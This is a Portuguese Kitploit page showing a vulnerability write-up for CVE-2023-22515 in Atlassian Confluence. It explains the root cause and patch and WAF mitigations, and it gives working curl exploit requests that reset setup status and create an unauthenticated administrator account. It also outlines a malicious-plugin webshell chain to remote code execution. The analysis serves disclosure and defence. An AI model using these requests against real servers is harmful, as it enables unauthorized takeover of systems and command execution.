Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-22515 — Análise detalhada e exploit de prova de conceito para CVE-2023-22515, uma vulnerabilidade crítica de controle de acesso quebrado no Atlassian Confluence Data Center e Server, permitindo a criação não autenticada de contas de administrador e potencial execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/dkq-k/cve-2023-22515
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

Análise detalhada e exploit de prova de conceito para CVE-2023-22515, uma vulnerabilidade crítica de controle de acesso quebrado no Atlassian Confluence Data Center e Server, permitindo a criação não autenticada de contas de administrador e potencial execução remota de código.

Ver Repositório
8há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-22515: Relatório de Análise da Vulnerabilidade de Escalação de Privilégios no Confluence Data Center & Server

1. Visão Geral

A CVE-2023-22515 é uma vulnerabilidade crítica de Broken Access Control (Controle de Acesso Quebrado) encontrada nos produtos Atlassian Confluence Data Center e Server. Um atacante não autenticado pode reativar remotamente o processo de configuração inicial do servidor e, a partir disso, criar uma nova conta de administrador e assumir o controle total do sistema.

  • ID CVE: CVE-2023-22515
  • Pontuação CVSS: 10.0 (Crítica)
  • Versões afetadas: 8.0.0 ~ 8.5.1 (exceto algumas versões)

2. Análise Detalhada da Vulnerabilidade

Causa Raiz

O núcleo desta vulnerabilidade está na validação insuficiente entre o mecanismo de ligação de parâmetros (parameter binding) do framework XWork2 e a lógica de processamento de ações (Action) do Confluence.

O atacante pode manipular o valor de bootstrapStatusProvider.applicationConfig.setupComplete para false por meio de parâmetros de URL. Essa propriedade é um flag importante que determina se o Confluence concluiu a instalação e a configuração.

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

Ao enviar essa solicitação, o servidor passa a reconhecer, em memória, que a configuração não foi concluída. Isso não altera o arquivo de configuração persistente (confluence.cfg.xml), mas altera o estado em tempo de execução, permitindo contornar o controle de acesso.

Mecanismo de Ataque

  1. Redefinição do estado de configuração: O atacante acessa endpoints públicos como /server-info.action enquanto envia o parâmetro bootstrapStatusProvider.applicationConfig.setupComplete=false.
  2. Contorno do controle de acesso: Como o servidor agora se reconhece como "em instalação", as restrições de acesso às páginas administrativas em /setup/* são removidas.
  3. Criação de conta de administrador: O atacante acessa a página /setup/setupadministrator.action e cria uma nova conta de administrador de sistema (System Administrator).
  4. Assunção do controle do sistema: Ao fazer login com a conta de administrador criada, o atacante obtém todas as permissões do sistema. Isso possibilita ações maliciosas adicionais, como upload de web shell, exfiltração de dados e implantação de ransomware.

3. Reprodução da Vulnerabilidade

Configuração do Ambiente

Utilizamos Docker para implantar o Confluence Server na versão vulnerável (8.5.1).

  • Imagem Docker: atlassian/confluence-server:8.5.1
  • Banco de dados: PostgreSQL 14

docker-compose.yml (resumo):

services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... DB 설정 ...

Execução do Exploit

Para evitar problemas de dependências do Python, escrevemos e executamos um PoC como script Bash usando curl.

Fluxo do Exploit:

  1. Redefinir o status da configuração:

    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    Resultado: Foi retornada uma resposta de redirecionamento HTTP 302, confirmando que o status de configuração concluída foi liberado internamente.

  2. Criar administrador:

    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    Resultado: Por meio dessa solicitação, tentamos criar a conta hacked_admin, e posteriormente foi possível acessar a página de login com essa conta.

4. Medidas de Mitigação

Aplicação de Patch

Atualize imediatamente para a versão mais recente fornecida pela Atlassian.

  • Versões corrigidas: 8.3.3, 8.4.3, 8.5.2 ou superior

Medida Temporária de Mitigação

Se o patch não for possível, bloqueie o acesso aos endpoints /setup/* no nível de rede (balanceador de carga, WAF, proxy reverso, etc.).

  • URL a ser bloqueada: /setup/*

6. Ataque Avançado: Cenário de RCE (Execução Remota de Código)

Um atacante que obtém privilégios de administrador por meio da CVE-2023-22515 pode avançar para a execução de comandos do sistema (RCE).

Visão Geral

O Confluence oferece aos administradores a permissão de instalar plugins (add-ons). O atacante pode explorar isso para fazer upload de um plugin malicioso contendo funcionalidades de web shell, obtendo assim o controle sobre o sistema operacional do servidor.

Cadeia de Ataque

  1. Criação de conta de administrador (CVE-2023-22515): Obtenção de privilégios de administrador de sistema pelo método descrito anteriormente.
  2. Truque de conclusão da configuração: Se o servidor estiver preso no 'Modo de Configuração' (Setup Mode), force a conclusão da configuração via /setup/finishsetup.action (exigindo bypass de licença) ou explore os menus administrativos acessíveis usando a sessão existente.
  3. Upload de plugin malicioso:
    • Menu: Confluence Administration -> Manage Apps -> Upload App
    • Arquivo: arquivo .jar contendo classes Java maliciosas
  4. Execução de comandos:
    • Acessar a URL fornecida pelo plugin enviado (ex.: /plugins/servlet/webshell?cmd=id) para executar comandos do sistema

Limitações do Ambiente de Reprodução Atual

Este ambiente de laboratório (Docker) não possui uma licença válida do Confluence, portanto não é possível concluir a etapa de configuração inicial (Setup). Assim, a solicitação de criação da conta de administrador foi bem-sucedida (redirecionamento 302), mas o acesso posterior ao menu de plugins e a execução real de RCE foram limitados. Em um ambiente de produção real, a licença está registrada, portanto o RCE pode ser executado imediatamente, sem essas restrições.

7. Conclusão

A CVE-2023-22515 é uma vulnerabilidade extremamente perigosa que permite obter privilégios de administrador sem autenticação. O ataque é possível apenas com a manipulação de parâmetros de URL, tornando a dificuldade do ataque muito baixa. Portanto, organizações que utilizam as versões afetadas devem aplicar imediatamente patches ou medidas de mitigação.

Baixar ferramenta